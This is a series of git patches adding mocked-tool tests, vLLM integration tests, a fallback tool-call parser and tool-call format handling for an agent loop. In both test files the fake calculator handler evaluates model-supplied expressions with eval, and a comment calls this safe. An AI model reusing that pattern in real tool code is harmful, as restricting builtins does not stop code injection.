+    "type": "function",
+    "function": {
+        "name": "failing_tool",
+        "description": "A tool that always fails with an error.",
+        "parameters": {
+            "type": "object",
+            "properties": {
+                "input": {"type": "string"}
+            },
+            "required": ["input"],
+        },
+    },
+}
+
+
+def _fake_tool_handler(tool_name: str, args: Dict[str, Any], **kwargs) -> str:
+    """Handle fake tool calls for testing."""
+    if tool_name == "calculate":
+        expr = args.get("expression", "0")
+        try:
+            # Safe eval for simple math
+            result = eval(expr, {"__builtins__": {}}, {})
+            return json.dumps({"result": result})
+        except Exception as e:
+            return json.dumps({"error": str(e)})
+
+    elif tool_name == "get_weather":
+        city = args.get("city", "Unknown")
+        # Return canned weather
+        return json.dumps({
+            "city": city,
+            "temperature": 22,
+            "conditions": "sunny",
+            "humidity": 45,
+        })
+
+    elif tool_name == "lookup":
+        query = args.get("query", "")
+        return json.dumps({"answer": f"The answer to '{query}' is 42."})
+
+    elif tool_name == "failing_tool":
+        raise RuntimeError("This tool always fails!")
+
+    return json.dumps({"error": f"Unknown tool: {tool_name}"})
+
+
+# =========================================================================
+# Tests
+# =========================================================================
+
+@pytest.mark.asyncio
+async def test_single_tool_call():
+    """Model should call a single tool, get the result, and respond."""
+
+    async def _run(server, model):
+        agent = HermesAgentLoop(
+            server=server,
+            tool_schemas=[WEATHER_TOOL],
+            valid_tool_names={"get_weather"},
+            max_turns=5,
+            temperature=0.0,
+            max_tokens=500,
+        )
+
+        messages = [
+            {"role": "user", "content": "What's the weather in Tokyo? Use the get_weather tool."},
+        ]
+
+        with patch("environments.agent_loop.handle_function_call", side_effect=_fake_tool_handler):
+            result = await agent.run(messages)
+
+        assert isinstance(result, AgentResult)
+        assert result.turns_used >= 2, f"Expected at least 2 turns (tool call + response), got {result.turns_used}"
+
+        # Verify a tool call happened
+        tool_calls_found = False
+        for msg in result.messages:
+            if msg.get("role") == "assistant" and msg.get("tool_calls"):
+                for tc in msg["tool_calls"]:
+                    if tc["function"]["name"] == "get_weather":
+                        tool_calls_found = True
+                        args = json.loads(tc["function"]["arguments"])
+                        assert "city" in args
+        assert tool_calls_found, "Model should have called get_weather"
+
+        # Verify tool result is in conversation
+        tool_results = [m for m in result.messages if m.get("role") == "tool"]
+        assert len(tool_results) >= 1, "Should have at least one tool result"
+
+        # Verify the final response references the weather
+        final_msg = result.messages[-1]
+        assert final_msg["role"] == "assistant"
+        assert final_msg["content"], "Final response should have content"
+
+        return result
+
+    await _try_models(_run)
+
+
+@pytest.mark.asyncio
+async def test_multi_tool_single_turn():
+    """Model should call multiple tools in a single turn."""
+
+    async def _run(server, model):
+        agent = HermesAgentLoop(
+            server=server,
+            tool_schemas=[WEATHER_TOOL, CALC_TOOL],
+            valid_tool_names={"get_weather", "calculate"},
+            max_turns=5,
+            temperature=0.0,
+            max_tokens=500,
+        )
+
+        messages = [
+            {"role": "user", "content": (
+                "I need two things at once: "
+                "1) What's the weather in Paris? Use get_weather. "
+                "2) What is 15 * 7? Use calculate. "
+                "Call BOTH tools in a single response."
+            )},
+        ]
+
+        with patch("environments.agent_loop.handle_function_call", side_effect=_fake_tool_handler):
+            result = await agent.run(messages)
+
+        # Count distinct tools called
+        tools_called = set()
+        for msg in result.messages:
+            if msg.get("role") == "assistant" and msg.get("tool_calls"):
+                for tc in msg["tool_calls"]:
+                    tools_called.add(tc["function"]["name"])
+
+        # At minimum, both tools should have been called (maybe in different turns)
+        assert "get_weather" in tools_called, f"get_weather not called. Called: {tools_called}"
+        assert "calculate" in tools_called, f"calculate not called. Called: {tools_called}"
+
+        return result
+
+    await _try_models(_run)
+
+
+@pytest.mark.asyncio
+async def test_multi_turn_conversation():
+    """Agent should handle multiple turns of tool calls."""
+
+    async def _run(server, model):
+        agent = HermesAgentLoop(
+            server=server,
+            tool_schemas=[LOOKUP_TOOL, CALC_TOOL],
+            valid_tool_names={"lookup", "calculate"},
+            max_turns=10,
+            temperature=0.0,
+            max_tokens=500,
+        )
+
+        messages = [
+            {"role": "user", "content": (
+                "First, use the lookup tool to look up 'meaning of life'. "
+                "Then use calculate to compute 6 * 7. "
+                "Do these in separate tool calls, one at a time."
+            )},
+        ]
+
+        with patch("environments.agent_loop.handle_function_call", side_effect=_fake_tool_handler):
+            result = await agent.run(messages)
+
+        # Should have used both tools
+        tools_called = set()
+        for msg in result.messages:
+            if msg.get("role") == "assistant" and msg.get("tool_calls"):
+                for tc in msg["tool_calls"]:
+                    tools_called.add(tc["function"]["name"])
+
+        assert "lookup" in tools_called, f"lookup not called. Called: {tools_called}"
+        assert "calculate" in tools_called, f"calculate not called. Called: {tools_called}"
+
+        # Should finish naturally
+        assert result.finished_naturally, "Should finish naturally after answering"
+
+        return result
+
+    await _try_models(_run)
+
+
+@pytest.mark.asyncio
+async def test_unknown_tool_rejected():
+    """If the model calls a tool not in valid_tool_names, it gets an error."""
+
+    async def _run(server, model):
+        # Only allow "calculate" but give schema for both
+        agent = HermesAgentLoop(
+            server=server,
+            tool_schemas=[CALC_TOOL, WEATHER_TOOL],
+            valid_tool_names={"calculate"},  # weather NOT allowed
+            max_turns=5,
+            temperature=0.0,
+            max_tokens=500,
+        )
+
+        messages = [
+            {"role": "user", "content": "What's the weather in London? Use get_weather."},
+        ]
+
+        with patch("environments.agent_loop.handle_function_call", side_effect=_fake_tool_handler):
+            result = await agent.run(messages)
+
+        # Check if get_weather was called and rejected
+        if result.tool_errors:
+            weather_errors = [e for e in result.tool_errors if e.tool_name == "get_weather"]
+            assert len(weather_errors) > 0, "get_weather should have been rejected"
+            assert "Unknown tool" in weather_errors[0].error
+
+        return result
+
+    await _try_models(_run)
+
+
+@pytest.mark.asyncio
+async def test_max_turns_limit():
+    """Agent should stop after max_turns even if model keeps calling tools."""
+
+    async def _run(server, model):
+        agent = HermesAgentLoop(
+            server=server,
+            tool_schemas=[LOOKUP_TOOL],
+            valid_tool_names={"lookup"},
+            max_turns=2,  # Very low limit
+            temperature=0.0,
+            max_tokens=500,
+        )
+
+        messages = [
+            {"role": "user", "content": (
+                "Keep looking up facts. Look up 'fact 1', then 'fact 2', "
+                "then 'fact 3', then 'fact 4'. Do them one at a time."
+            )},
+        ]
+
+        with patch("environments.agent_loop.handle_function_call", side_effect=_fake_tool_handler):
+            result = await agent.run(messages)
+
+        assert result.turns_used <= 2, f"Should stop at max_turns=2, used {result.turns_used}"
+        assert not result.finished_naturally, "Should NOT finish naturally (hit max_turns)"
+
+        return result
+
+    await _try_models(_run)
+
+
+@pytest.mark.asyncio
+async def test_no_tools_direct_response():
+    """When no tools are useful, model should respond directly."""
+
+    async def _run(server, model):
+        agent = HermesAgentLoop(
+            server=server,
+            tool_schemas=[WEATHER_TOOL],
+            valid_tool_names={"get_weather"},
+            max_turns=5,
+            temperature=0.0,
+            max_tokens=200,
+        )
+
+        messages = [
+            {"role": "user", "content": "What is 2 + 2? Just answer directly, no tools needed."},
+        ]
+
+        with patch("environments.agent_loop.handle_function_call", side_effect=_fake_tool_handler):
+            result = await agent.run(messages)
+
+        assert result.finished_naturally, "Should finish naturally with a direct response"
+        assert result.turns_used == 1, f"Should take exactly 1 turn for a direct answer, took {result.turns_used}"
+
+        final = result.messages[-1]
+        assert final["role"] == "assistant"
+        assert final["content"], "Should have text content"
+        assert "4" in final["content"], "Should contain the answer '4'"
+
+        return result
+
+    await _try_models(_run)
+
+
+@pytest.mark.asyncio
+async def test_tool_error_handling():
+    """Tool execution errors should be captured and reported to the model."""
+
+    async def _run(server, model):
+        agent = HermesAgentLoop(
+            server=server,
+            tool_schemas=[ERROR_TOOL],
+            valid_tool_names={"failing_tool"},
+            max_turns=5,
+            temperature=0.0,
+            max_tokens=500,
+        )
+
+        messages = [
+            {"role": "user", "content": "Please call the failing_tool with input 'test'."},
+        ]
+
+        with patch("environments.agent_loop.handle_function_call", side_effect=_fake_tool_handler):
+            result = await agent.run(messages)
+
+        # The tool error should be recorded
+        assert len(result.tool_errors) >= 1, "Should have at least one tool error"
+        assert "RuntimeError" in result.tool_errors[0].error or "always fails" in result.tool_errors[0].error
+
+        # The error should be in the conversation as a tool result
+        tool_results = [m for m in result.messages if m.get("role") == "tool"]
+        assert len(tool_results) >= 1
+        error_result = json.loads(tool_results[0]["content"])
+        assert "error" in error_result
+
+        return result
+
+    await _try_models(_run)
+
+
+@pytest.mark.asyncio
+async def test_agent_result_structure():
+    """Verify the AgentResult has all expected fields populated."""
+
+    async def _run(server, model):
+        agent = HermesAgentLoop(
+            server=server,
+            tool_schemas=[CALC_TOOL],
+            valid_tool_names={"calculate"},
+            max_turns=5,
+            temperature=0.0,
+            max_tokens=300,
+        )
+
+        messages = [
+            {"role": "user", "content": "What is 3 + 4? Use the calculate tool."},
+        ]
+
+        with patch("environments.agent_loop.handle_function_call", side_effect=_fake_tool_handler):
+            result = await agent.run(messages)
+
+        # Structural checks
+        assert isinstance(result, AgentResult)
+        assert isinstance(result.messages, list)
+        assert len(result.messages) >= 3, "Should have user + assistant(tool) + tool_result + assistant(final)"
+        assert isinstance(result.turns_used, int)
+        assert result.turns_used > 0
+        assert isinstance(result.finished_naturally, bool)
+        assert isinstance(result.tool_errors, list)
+        assert isinstance(result.reasoning_per_turn, list)
+
+        # Messages should follow OpenAI format
+        for msg in result.messages:
+            assert "role" in msg, f"Message missing 'role': {msg}"
+            assert msg["role"] in ("system", "user", "assistant", "tool"), f"Invalid role: {msg['role']}"
+
+        return result
+
+    await _try_models(_run)
+
+
+@pytest.mark.asyncio
+async def test_conversation_history_preserved():
+    """The full conversation history should be in result.messages."""
+
+    async def _run(server, model):
+        agent = HermesAgentLoop(
+            server=server,
+            tool_schemas=[WEATHER_TOOL],
+            valid_tool_names={"get_weather"},
+            max_turns=5,
+            temperature=0.0,
+            max_tokens=500,
+        )
+
+        messages = [
+            {"role": "system", "content": "You are a helpful weather assistant."},
+            {"role": "user", "content": "What's the weather in Berlin? Use get_weather."},
+        ]
+
+        with patch("environments.agent_loop.handle_function_call", side_effect=_fake_tool_handler):
+            result = await agent.run(messages)
+
+        # System message should be preserved
+        assert result.messages[0]["role"] == "system"
+        assert "weather assistant" in result.messages[0]["content"]
+
+        # User message should be preserved
+        assert result.messages[1]["role"] == "user"
+        assert "Berlin" in result.messages[1]["content"]
+
+        # Should have assistant + tool + assistant sequence
+        roles = [m["role"] for m in result.messages]
+        assert "tool" in roles, "Should have tool results in conversation"
+
+        return result
+
+    await _try_models(_run)

From 84147f4d815b834aa6e3b6a54ac80a5aa414af43 Mon Sep 17 00:00:00 2001
From: dmahan93 <dmayhem93@gmail.com>
Date: Mon, 9 Mar 2026 20:49:18 -0500
Subject: [PATCH 080/105] refactor: update to new atropos tool-calling API

Migrate from old tool_call_parser (instance) to new ToolCallTranslator
pattern from atropos add-openai-endpoint-for-managed-server branch:

- Set tool_parser on ServerManager (string name, e.g. 'hermes')
- Use managed_server(tokenizer=..., preserve_think_blocks=...)
  instead of managed_server(tokenizer=..., tool_call_parser=instance)
- ManagedServer now handles tool call translation internally via
  ToolCallTranslator (bidirectional raw text <-> OpenAI tool_calls)
- Remove old parser loading code (get_parser/KeyError fallback)

The hermes-agent tool_call_parsers/ directory is preserved as a
standalone fallback for environments that don't use vLLM's parsers.
---
 environments/hermes_base_env.py | 24 +++++++++++-------------
 1 file changed, 11 insertions(+), 13 deletions(-)

diff --git a/environments/hermes_base_env.py b/environments/hermes_base_env.py
index 9025edd2..651722ff 100644
--- a/environments/hermes_base_env.py
+++ b/environments/hermes_base_env.py
@@ -229,6 +229,12 @@ class HermesAgentBaseEnv(BaseEnv):
         from environments.agent_loop import resize_tool_pool
         resize_tool_pool(config.tool_pool_size)
 
+        # Set tool_parser on the ServerManager so ManagedServer uses it
+        # for bidirectional tool call translation (raw text ↔ OpenAI tool_calls).
+        if hasattr(self.server, 'tool_parser'):
+            self.server.tool_parser = config.tool_call_parser
+            print(f"🔧 Tool parser: {config.tool_call_parser}")
+
         # Current group's resolved tools (set in collect_trajectories)
         self._current_group_tools: Optional[Tuple[List[Dict], Set[str]]] = None
 
@@ -466,22 +472,14 @@ class HermesAgentBaseEnv(BaseEnv):
         # Run the agent loop
         result: AgentResult
         if self._use_managed_server():
-            # Phase 2: ManagedServer with parser -- exact tokens + logprobs
-            # Load the tool call parser from registry based on config
-            from environments.tool_call_parsers import get_parser
-            try:
-                tc_parser = get_parser(self.config.tool_call_parser)
-            except KeyError:
-                logger.warning(
-                    "Tool call parser '%s' not found, falling back to 'hermes'",
-                    self.config.tool_call_parser,
-                )
-                tc_parser = get_parser("hermes")
-
+            # Phase 2: ManagedServer with ToolCallTranslator -- exact tokens + logprobs
+            # tool_parser is set on ServerManager in __init__ and passed through
+            # to ManagedServer, which uses ToolCallTranslator for bidirectional
+            # translation between raw text and OpenAI tool_calls.
             try:
                 async with self.server.managed_server(
                     tokenizer=self.tokenizer,
-                    tool_call_parser=tc_parser,
+                    preserve_think_blocks=bool(self.config.thinking_mode),
                 ) as managed:
                     agent = HermesAgentLoop(
                         server=managed,

From 09fc64c6b6b4bec6481be90a85e6d84a4e21ff76 Mon Sep 17 00:00:00 2001
From: dmahan93 <dmayhem93@gmail.com>
Date: Mon, 9 Mar 2026 20:55:07 -0500
Subject: [PATCH 081/105] add eval output to gitignore

---
 .gitignore | 1 +
 1 file changed, 1 insertion(+)

diff --git a/.gitignore b/.gitignore
index 78a38294..82f77295 100644
--- a/.gitignore
+++ b/.gitignore
@@ -49,3 +49,4 @@ cli-config.yaml
 skills/.hub/
 ignored/
 .worktrees/
+environments/benchmarks/evals/

From 1f9e7cd65989e4c26092d55747fe751c5e6f94bb Mon Sep 17 00:00:00 2001
From: dmahan93 <dmayhem93@gmail.com>
Date: Mon, 9 Mar 2026 21:18:42 -0500
Subject: [PATCH 082/105] test: 5 vLLM integration tests + fallback tool call
 parser

Tests hit a real vLLM server (Qwen/Qwen3-4B-Thinking-2507) via
ManagedServer Phase 2. Auto-skip if server isn't running.

Tests verify:
- Single tool call through full agent loop
- Multi-tool calls across turns
- ManagedServer produces SequenceNodes with tokens/logprobs
- Direct response without tools
- Thinking model produces <think> blocks

Also adds fallback parser in agent_loop.py: when ManagedServer's
ToolCallTranslator can't parse (vLLM not installed), hermes-agent's
standalone parsers extract <tool_call> tags from raw content.
---
 environments/agent_loop.py    |  30 ++-
 tests/test_agent_loop_vllm.py | 356 ++++++++++++++++++++++++++++++++++
 2 files changed, 385 insertions(+), 1 deletion(-)
 create mode 100644 tests/test_agent_loop_vllm.py

diff --git a/environments/agent_loop.py b/environments/agent_loop.py
index ce2b1f9b..b2d29c6f 100644
--- a/environments/agent_loop.py
+++ b/environments/agent_loop.py
@@ -249,7 +249,35 @@ class HermesAgentLoop:
             reasoning = _extract_reasoning_from_message(assistant_msg)
             reasoning_per_turn.append(reasoning)
 
-            # Check for tool calls -- standard OpenAI spec
+            # Check for tool calls -- standard OpenAI spec.
+            # Fallback: if response has no structured tool_calls but content
+            # contains raw tool call tags (e.g. <tool_call>), parse them using
+            # hermes-agent's standalone parsers. This handles the case where
+            # ManagedServer's ToolCallTranslator couldn't parse because vLLM
+            # isn't installed.
+            if (
+                not assistant_msg.tool_calls
+                and assistant_msg.content
+                and self.tool_schemas
+                and "<tool_call>" in (assistant_msg.content or "")
+            ):
+                try:
+                    from environments.tool_call_parsers import get_parser
+                    fallback_parser = get_parser("hermes")
+                    parsed_content, parsed_calls = fallback_parser.parse(
+                        assistant_msg.content
+                    )
+                    if parsed_calls:
+                        assistant_msg.tool_calls = parsed_calls
+                        if parsed_content is not None:
+                            assistant_msg.content = parsed_content
+                        logger.debug(
+                            "Fallback parser extracted %d tool calls from raw content",
+                            len(parsed_calls),
+                        )
+                except Exception:
+                    pass  # Fall through to no tool calls
+
             if assistant_msg.tool_calls:
                 # Build the assistant message dict for conversation history
                 msg_dict: Dict[str, Any] = {
diff --git a/tests/test_agent_loop_vllm.py b/tests/test_agent_loop_vllm.py
new file mode 100644
index 00000000..1a21d440
--- /dev/null
+++ b/tests/test_agent_loop_vllm.py
@@ -0,0 +1,356 @@
+"""Integration tests for HermesAgentLoop with a local vLLM server.
+
+Tests the full Phase 2 flow: ManagedServer + tool calling with a real
+vLLM backend, producing actual token IDs and logprobs for RL training.
+
+Requires a running vLLM server. Start one from the atropos directory:
+
+    python -m example_trainer.vllm_api_server \
+        --model Qwen/Qwen3-4B-Thinking-2507 \
+        --port 9001 \
+        --gpu-memory-utilization 0.8 \
+        --max-model-len=32000
+
+Tests are automatically skipped if the server is not reachable.
+
+Run:
+    pytest tests/test_agent_loop_vllm.py -v
+    pytest tests/test_agent_loop_vllm.py -v -k "single"
+"""
+
+import asyncio
+import json
+import os
+import sys
+from pathlib import Path
+from typing import Any, Dict
+from unittest.mock import patch
+
+import pytest
+import requests
+
+# Ensure repo root is importable
+_repo_root = Path(__file__).resolve().parent.parent
+if str(_repo_root) not in sys.path:
+    sys.path.insert(0, str(_repo_root))
+
+from environments.agent_loop import AgentResult, HermesAgentLoop
+
+
+# =========================================================================
+# Configuration
+# =========================================================================
+
+VLLM_HOST = "localhost"
+VLLM_PORT = 9001
+VLLM_BASE_URL = f"http://{VLLM_HOST}:{VLLM_PORT}"
+VLLM_MODEL = "Qwen/Qwen3-4B-Thinking-2507"
+
+
+def _vllm_is_running() -> bool:
+    """Check if the vLLM server is reachable."""
+    try:
+        r = requests.get(f"{VLLM_BASE_URL}/health", timeout=3)
+        return r.status_code == 200
+    except Exception:
+        return False
+
+
+# Skip all tests in this module if vLLM is not running
+pytestmark = pytest.mark.skipif(
+    not _vllm_is_running(),
+    reason=(
+        f"vLLM server not reachable at {VLLM_BASE_URL}. "
+        "Start it with: python -m example_trainer.vllm_api_server "
+        f"--model {VLLM_MODEL} --port {VLLM_PORT} "
+        "--gpu-memory-utilization 0.8 --max-model-len=32000"
+    ),
+)
+
+
+# =========================================================================
+# Server setup
+# =========================================================================
+
+def _make_server_manager():
+    """Create a ServerManager pointing to the local vLLM server."""
+    from atroposlib.envs.server_handling.server_manager import (
+        ServerManager,
+        APIServerConfig,
+    )
+
+    config = APIServerConfig(
+        base_url=VLLM_BASE_URL,
+        model_name=VLLM_MODEL,
+        server_type="vllm",
+        health_check=False,
+    )
+    sm = ServerManager([config], tool_parser="hermes")
+    sm.servers[0].server_healthy = True
+    return sm
+
+
+def _get_tokenizer():
+    """Load the tokenizer for the model."""
+    from transformers import AutoTokenizer
+    return AutoTokenizer.from_pretrained(VLLM_MODEL)
+
+
+# =========================================================================
+# Fake tools
+# =========================================================================
+
+WEATHER_TOOL = {
+    "type": "function",
+    "function": {
+        "name": "get_weather",
+        "description": "Get the current weather for a city. Returns temperature and conditions.",
+        "parameters": {
+            "type": "object",
+            "properties": {
+                "city": {
+                    "type": "string",
+                    "description": "City name, e.g. 'Tokyo'",
+                }
+            },
+            "required": ["city"],
+        },
+    },
+}
+
+CALC_TOOL = {
+    "type": "function",
+    "function": {
+        "name": "calculate",
+        "description": "Calculate a math expression. Returns the numeric result.",
+        "parameters": {
+            "type": "object",
+            "properties": {
+                "expression": {
+                    "type": "string",
+                    "description": "Math expression, e.g. '2 + 3'",
+                }
+            },
+            "required": ["expression"],
+        },
+    },
+}
+
+
+def _fake_tool_handler(tool_name: str, args: Dict[str, Any], **kwargs) -> str:
+    """Handle fake tool calls for testing."""
+    if tool_name == "get_weather":
+        city = args.get("city", "Unknown")
+        return json.dumps({
+            "city": city,
+            "temperature": 22,
+            "conditions": "sunny",
+            "humidity": 45,
+        })
+    elif tool_name == "calculate":
+        expr = args.get("expression", "0")
+        try:
+            result = eval(expr, {"__builtins__": {}}, {})
+            return json.dumps({"result": result})
+        except Exception as e:
+            return json.dumps({"error": str(e)})
+    return json.dumps({"error": f"Unknown tool: {tool_name}"})
+
+
+# =========================================================================
+# Tests
+# =========================================================================
+
+@pytest.mark.asyncio
+async def test_vllm_single_tool_call():
+    """vLLM model calls a tool, gets result, responds — full Phase 2 flow."""
+    sm = _make_server_manager()
+    tokenizer = _get_tokenizer()
+
+    async with sm.managed_server(tokenizer=tokenizer) as managed:
+        agent = HermesAgentLoop(
+            server=managed,
+            tool_schemas=[WEATHER_TOOL],
+            valid_tool_names={"get_weather"},
+            max_turns=5,
+            temperature=0.6,
+            max_tokens=1000,
+        )
+
+        messages = [
+            {"role": "user", "content": "What's the weather in Tokyo? Use the get_weather tool."},
+        ]
+
+        with patch("environments.agent_loop.handle_function_call", side_effect=_fake_tool_handler):
+            result = await agent.run(messages)
+
+    assert isinstance(result, AgentResult)
+    assert result.turns_used >= 2, f"Expected at least 2 turns, got {result.turns_used}"
+
+    # Verify tool call happened
+    tool_calls_found = False
+    for msg in result.messages:
+        if msg.get("role") == "assistant" and msg.get("tool_calls"):
+            for tc in msg["tool_calls"]:
+                if tc["function"]["name"] == "get_weather":
+                    tool_calls_found = True
+                    args = json.loads(tc["function"]["arguments"])
+                    assert "city" in args
+    assert tool_calls_found, "Model should have called get_weather"
+
+    # Verify tool results in conversation
+    tool_results = [m for m in result.messages if m.get("role") == "tool"]
+    assert len(tool_results) >= 1
+
+
+@pytest.mark.asyncio
+async def test_vllm_multi_tool_calls():
+    """vLLM model calls multiple tools across turns."""
+    sm = _make_server_manager()
+    tokenizer = _get_tokenizer()
+
+    async with sm.managed_server(tokenizer=tokenizer) as managed:
+        agent = HermesAgentLoop(
+            server=managed,
+            tool_schemas=[WEATHER_TOOL, CALC_TOOL],
+            valid_tool_names={"get_weather", "calculate"},
+            max_turns=10,
+            temperature=0.6,
+            max_tokens=1000,
+        )
+
+        messages = [
+            {"role": "user", "content": (
+                "I need two things: "
+                "1) What's the weather in Paris? Use get_weather. "
+                "2) What is 15 * 7? Use calculate."
+            )},
+        ]
+
+        with patch("environments.agent_loop.handle_function_call", side_effect=_fake_tool_handler):
+            result = await agent.run(messages)
+
+    # Both tools should be called
+    tools_called = set()
+    for msg in result.messages:
+        if msg.get("role") == "assistant" and msg.get("tool_calls"):
+            for tc in msg["tool_calls"]:
+                tools_called.add(tc["function"]["name"])
+
+    assert "get_weather" in tools_called, f"get_weather not called. Called: {tools_called}"
+    assert "calculate" in tools_called, f"calculate not called. Called: {tools_called}"
+
+
+@pytest.mark.asyncio
+async def test_vllm_managed_server_produces_nodes():
+    """ManagedServer should produce SequenceNodes with tokens and logprobs."""
+    sm = _make_server_manager()
+    tokenizer = _get_tokenizer()
+
+    async with sm.managed_server(tokenizer=tokenizer) as managed:
+        agent = HermesAgentLoop(
+            server=managed,
+            tool_schemas=[WEATHER_TOOL],
+            valid_tool_names={"get_weather"},
+            max_turns=5,
+            temperature=0.6,
+            max_tokens=1000,
+        )
+
+        messages = [
+            {"role": "user", "content": "What's the weather in Berlin? Use get_weather."},
+        ]
+
+        with patch("environments.agent_loop.handle_function_call", side_effect=_fake_tool_handler):
+            result = await agent.run(messages)
+
+        # Get the managed state — should have SequenceNodes
+        state = managed.get_state()
+
+    assert state is not None, "ManagedServer should return state"
+    nodes = state.get("nodes", [])
+    assert len(nodes) >= 1, f"Should have at least 1 node, got {len(nodes)}"
+
+    node = nodes[0]
+    assert hasattr(node, "tokens"), "Node should have tokens"
+    assert hasattr(node, "logprobs"), "Node should have logprobs"
+    assert len(node.tokens) > 0, "Tokens should not be empty"
+    assert len(node.logprobs) > 0, "Logprobs should not be empty"
+    assert len(node.tokens) == len(node.logprobs), (
+        f"Tokens ({len(node.tokens)}) and logprobs ({len(node.logprobs)}) should have same length"
+    )
+
+
+@pytest.mark.asyncio
+async def test_vllm_no_tools_direct_response():
+    """vLLM model should respond directly when no tools are needed."""
+    sm = _make_server_manager()
+    tokenizer = _get_tokenizer()
+
+    async with sm.managed_server(tokenizer=tokenizer) as managed:
+        agent = HermesAgentLoop(
+            server=managed,
+            tool_schemas=[WEATHER_TOOL],
+            valid_tool_names={"get_weather"},
+            max_turns=5,
+            temperature=0.6,
+            max_tokens=500,
+        )
+
+        messages = [
+            {"role": "user", "content": "What is 2 + 2? Answer directly, no tools."},
+        ]
+
+        with patch("environments.agent_loop.handle_function_call", side_effect=_fake_tool_handler):
+            result = await agent.run(messages)
+
+    assert result.finished_naturally, "Should finish naturally"
+    assert result.turns_used == 1, f"Should take 1 turn, took {result.turns_used}"
+
+    final = result.messages[-1]
+    assert final["role"] == "assistant"
+    assert final["content"], "Should have content"
+
+
+@pytest.mark.asyncio
+async def test_vllm_thinking_content_extracted():
+    """Qwen3-Thinking model should produce reasoning content."""
+    sm = _make_server_manager()
+    tokenizer = _get_tokenizer()
+
+    async with sm.managed_server(
+        tokenizer=tokenizer,
+        preserve_think_blocks=True,
+    ) as managed:
+        agent = HermesAgentLoop(
+            server=managed,
+            tool_schemas=[CALC_TOOL],
+            valid_tool_names={"calculate"},
+            max_turns=5,
+            temperature=0.6,
+            max_tokens=1000,
+        )
+
+        messages = [
+            {"role": "user", "content": "What is 123 * 456? Use the calculate tool."},
+        ]
+
+        with patch("environments.agent_loop.handle_function_call", side_effect=_fake_tool_handler):
+            result = await agent.run(messages)
+
+    # Qwen3-Thinking should generate <think> blocks
+    # Check if any content contains thinking markers
+    has_thinking = False
+    for msg in result.messages:
+        content = msg.get("content", "") or ""
+        if "<think>" in content or "</think>" in content:
+            has_thinking = True
+            break
+
+    # Also check reasoning_per_turn
+    has_reasoning = any(r for r in result.reasoning_per_turn if r)
+
+    # At least one of these should be true for a thinking model
+    assert has_thinking or has_reasoning, (
+        "Qwen3-Thinking should produce <think> blocks or reasoning content"
+    )

From 93333387d60f4a53bc850ae2ea59baa76b587708 Mon Sep 17 00:00:00 2001
From: dmahan93 <dmayhem93@gmail.com>
Date: Mon, 9 Mar 2026 21:21:49 -0500
Subject: [PATCH 083/105] fix: handle dict and object tool_calls in agent loop

vLLM's ToolCallTranslator returns tool_calls as dicts, while
OpenAI API returns them as objects with .id, .function.name etc.
Normalize both formats in the agent loop.
---
 environments/agent_loop.py | 45 ++++++++++++++++++++++++++------------
 1 file changed, 31 insertions(+), 14 deletions(-)

diff --git a/environments/agent_loop.py b/environments/agent_loop.py
index b2d29c6f..ab8c0236 100644
--- a/environments/agent_loop.py
+++ b/environments/agent_loop.py
@@ -279,21 +279,32 @@ class HermesAgentLoop:
                     pass  # Fall through to no tool calls
 
             if assistant_msg.tool_calls:
+                # Normalize tool calls to dicts — they may come as objects
+                # (OpenAI API) or dicts (vLLM ToolCallTranslator).
+                def _tc_to_dict(tc):
+                    if isinstance(tc, dict):
+                        return {
+                            "id": tc.get("id", f"call_{uuid.uuid4().hex[:8]}"),
+                            "type": "function",
+                            "function": {
+                                "name": tc.get("function", {}).get("name", tc.get("name", "")),
+                                "arguments": tc.get("function", {}).get("arguments", tc.get("arguments", "{}")),
+                            },
+                        }
+                    return {
+                        "id": tc.id,
+                        "type": "function",
+                        "function": {
+                            "name": tc.function.name,
+                            "arguments": tc.function.arguments,
+                        },
+                    }
+
                 # Build the assistant message dict for conversation history
                 msg_dict: Dict[str, Any] = {
                     "role": "assistant",
                     "content": assistant_msg.content or "",
-                    "tool_calls": [
-                        {
-                            "id": tc.id,
-                            "type": "function",
-                            "function": {
-                                "name": tc.function.name,
-                                "arguments": tc.function.arguments,
-                            },
-                        }
-                        for tc in assistant_msg.tool_calls
-                    ],
+                    "tool_calls": [_tc_to_dict(tc) for tc in assistant_msg.tool_calls],
                 }
 
                 # Preserve reasoning_content for multi-turn chat template handling
@@ -306,8 +317,13 @@ class HermesAgentLoop:
 
                 # Execute each tool call via hermes-agent's dispatch
                 for tc in assistant_msg.tool_calls:
-                    tool_name = tc.function.name
-                    tool_args_raw = tc.function.arguments
+                    # Handle both object (OpenAI) and dict (vLLM) formats
+                    if isinstance(tc, dict):
+                        tool_name = tc.get("function", {}).get("name", tc.get("name", ""))
+                        tool_args_raw = tc.get("function", {}).get("arguments", tc.get("arguments", "{}"))
+                    else:
+                        tool_name = tc.function.name
+                        tool_args_raw = tc.function.arguments
 
                     # Validate tool name
                     if tool_name not in self.valid_tool_names:
@@ -418,10 +434,11 @@ class HermesAgentLoop:
                             pass
 
                     # Add tool response to conversation
+                    tc_id = tc.get("id", "") if isinstance(tc, dict) else tc.id
                     messages.append(
                         {
                             "role": "tool",
-                            "tool_call_id": tc.id,
+                            "tool_call_id": tc_id,
                             "content": tool_result,
                         }
                     )

From 13f545967010d0ddc19046eb6ef6caca095f991d Mon Sep 17 00:00:00 2001
From: dmahan93 <dmayhem93@gmail.com>
Date: Mon, 9 Mar 2026 21:32:23 -0500
Subject: [PATCH 084/105] fix: use ManagedServer for vLLM in TBLite eval +
 local_vllm config
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit

TBLite eval was bypassing ManagedServer and calling ServerManager
directly, which uses /v1/chat/completions — not available on the
atropos vllm_api_server (/generate only).

Now uses _use_managed_server() to detect vLLM/SGLang backends and
route through ManagedServer (Phase 2) with proper tool_parser and
/generate endpoint. Falls back to Phase 1 for OpenAI endpoints.

Also adds local_vllm.yaml config for running against a local vLLM
server with Docker sandboxes.
---
 .../benchmarks/tblite/local_vllm.yaml         | 39 +++++++++++++++++
 .../terminalbench_2/terminalbench2_env.py     | 42 ++++++++++++++-----
 2 files changed, 70 insertions(+), 11 deletions(-)
 create mode 100644 environments/benchmarks/tblite/local_vllm.yaml

diff --git a/environments/benchmarks/tblite/local_vllm.yaml b/environments/benchmarks/tblite/local_vllm.yaml
new file mode 100644
index 00000000..b6574a6b
--- /dev/null
+++ b/environments/benchmarks/tblite/local_vllm.yaml
@@ -0,0 +1,39 @@
+# OpenThoughts-TBLite Evaluation -- Local vLLM Backend
+#
+# Runs against a local vLLM server with Docker sandboxes.
+#
+# Start the vLLM server from the atropos directory:
+#   python -m example_trainer.vllm_api_server \
